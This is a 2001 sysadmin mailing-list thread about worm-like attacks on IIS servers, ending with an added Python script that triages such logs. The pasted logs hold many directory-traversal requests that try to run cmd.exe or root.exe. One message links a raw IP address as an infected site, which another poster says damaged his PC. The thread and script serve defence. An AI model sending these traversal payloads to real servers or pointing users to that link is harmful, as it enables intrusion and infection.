Shannon -- What version and SP did you have of
Internet Explorer?
Higgins
-----Original Message-----
From: Shannon Speck [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 2:38 PM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert
I, like a dumbass, went to this site and it fried some
Windows files and my PC wouldn't boot after that.
Luckily I dual boot two NTFS partitions so I was able
to come back up under XP and get all my data back.
Still had to reformat the W2k partition. Re-install
didn't work. Oh well, live and learn.
-----Original Message-----
From: David B. Lunn [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 12:34 AM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert
Why would you put a link to an infected site? If
someone does not have
Sept 18th patterns???? They will immediately be
infected???
-----Original Message-----
From: Martin Blackstone
[mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 8:19 AM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert
Here is a site that has been hit
http://216.39.178.32
-----Original Message-----
From: Jason Morris [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 7:59 AM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert
CodeRed seems to have dwindled to nothing on my logs.
But it's being
replaced with the EXACT same lines you have below, and
they stay
consistent with the code red 2 methods of attacking
the more local
subnets.
Jason Morris CCDA CCNP
Network Administrator
MJMC, Inc.
708-225-2350
[EMAIL PROTECTED]
-----Original Message-----
From: Jason Morris [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 9:50 AM
To: NT System Admin Issues
Cc: '[EMAIL PROTECTED]'
Subject: RE: WARNING: Hacker Alert
Yes. It seems to be systems I have previously
monitored hitting me with
codered attacks. I bet someone is activating all of
their children.
Jason Morris CCDA CCNP
Network Administrator
MJMC, Inc.
708-225-2350
[EMAIL PROTECTED]
-----Original Message-----
From: xylog [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 9:45 AM
To: NT System Admin Issues
Subject: WARNING: Hacker Alert
All my public-facing web servers at home and at my
office have shown
huge, continuous hacking activity. Has anyone seen
similar? I fear this
may be Code Red related or automated. Please comment
if you have seen
similar. Here is an excerpt from one logfile:
63.101.9.107, -, 9/18/01, 10:36:21, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /scripts/..�../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:33, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
64.156.252.27, -, 9/18/01, 10:36:42, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -,
63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET, /scripts/root.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 15, 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:06, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 15, 97, 604, 404, 3, GET, /scripts/..�../winnt/system32/cmd.exe, /c+dir,
64.156.252.27, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -,
63.101.171.231, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:17, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:21, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET, /scripts/root.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:22, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:24, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:26, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:34, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:36, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:42, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET, /scripts/root.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01, x.x.x.x, 15, 97, 604, 404, 3, GET, /scripts/..�../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:41, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:44, W3SVC4, DC1DIIS01, x.x.x.x, 15, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:44, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:44, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
64.156.252.27, -, 9/18/01, 10:39:45, W3SVC4, DC1DIIS01, x.x.x.x, 172, 41, 13973, 200, 0, GET, /mpf-flow/flow/login.cfm, -,
63.114.34.130, -, 9/18/01, 10:39:45, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:45, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:47, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
Confidential: This e-mail and any files transmitted
with it are the
property of Lanco International and/or its affiliates,
are confidential,
and are intended solely for the use of the individual
or entity to whom
this e-mail is addressed. If you are not one of the
named recipient(s)
or otherwise have reason to believe that you have
received this message
in error, please notify the sender at the above e-mail
address and
delete this message immediately from your computer.
Any other use,
retention, dissemination, forwarding, printing or
copying of this e-mail
is strictly prohibited.
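
[Added example, not part of the original thread or any poster's code.] A triage script for logs like the excerpt above: it rebuilds records from mail-wrapped text, counts cmd.exe/root.exe and traversal probes per client, and lists any probe the server answered with 200 (in the excerpt every probe got 404 or 500). Field names, the server name WEB01 and the sample addresses are assumptions made for this example.

```python
import re
from collections import defaultdict

# Column order of the comma-separated IIS log format seen in the excerpt
# (names are labels chosen for this example).
FIELDS = ("client", "user", "date", "time", "service", "server", "server_ip",
          "ms", "bytes_in", "bytes_out", "status", "win32", "method",
          "target", "query")

# Probe markers visible in the excerpt: shell binaries, encoded or plain
# traversal, and the non-ASCII bytes that show up garbled in some paths.
PROBE = re.compile(r"(cmd|root)\.exe|\.\.(%5c|%2f|[\\/])|[^\x00-\x7f]", re.I)

def records(text):
    """Rebuild records from mail-wrapped text: every field ends with a comma."""
    tokens = [t.strip() for t in text.replace("\n", " ").split(",")]
    tokens = tokens[:len(tokens) - len(tokens) % len(FIELDS)]  # drop partial tail
    for i in range(0, len(tokens), len(FIELDS)):
        yield dict(zip(FIELDS, tokens[i:i + len(FIELDS)]))

def triage(text):
    """Per-client probe summary; any probe answered 200 needs investigation."""
    report = defaultdict(lambda: {"probes": 0, "paths": set(), "answered_200": []})
    for rec in records(text):
        if PROBE.search(rec["target"]):
            entry = report[rec["client"]]
            entry["probes"] += 1
            entry["paths"].add(rec["target"].lower())
            if rec["status"] == "200":
                entry["answered_200"].append(rec["target"])
    return dict(report)

# Constructed sample in the excerpt's format (documentation addresses),
# wrapped mid-record the way the mail client wrapped the original.
SAMPLE = """192.0.2.10, -, 9/18/01, 10:36:28, W3SVC4, WEB01,
x.x.x.x, 0, 97, 604, 404, 3, GET, /scripts/root.exe,
/c+dir, 192.0.2.10, -, 9/18/01, 10:36:32, W3SVC4, WEB01, x.x.x.x, 0,
98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe
, /c+dir, 198.51.100.7, -, 9/18/01, 10:36:42, W3SVC4, WEB01, x.x.x.x,
156, 41, 13975, 200, 0, GET, /app/login.cfm, -,
192.0.2.10, -, 9/18/01, 10:36:33, W3SVC4, WEB01, x.x.x.x, 0, 96,
2048, 200, 0, GET, /MSADC/root.exe, /c+dir,
"""

if __name__ == "__main__":
    for client, entry in triage(SAMPLE).items():
        print(client, entry["probes"], sorted(entry["paths"]), entry["answered_200"])
```
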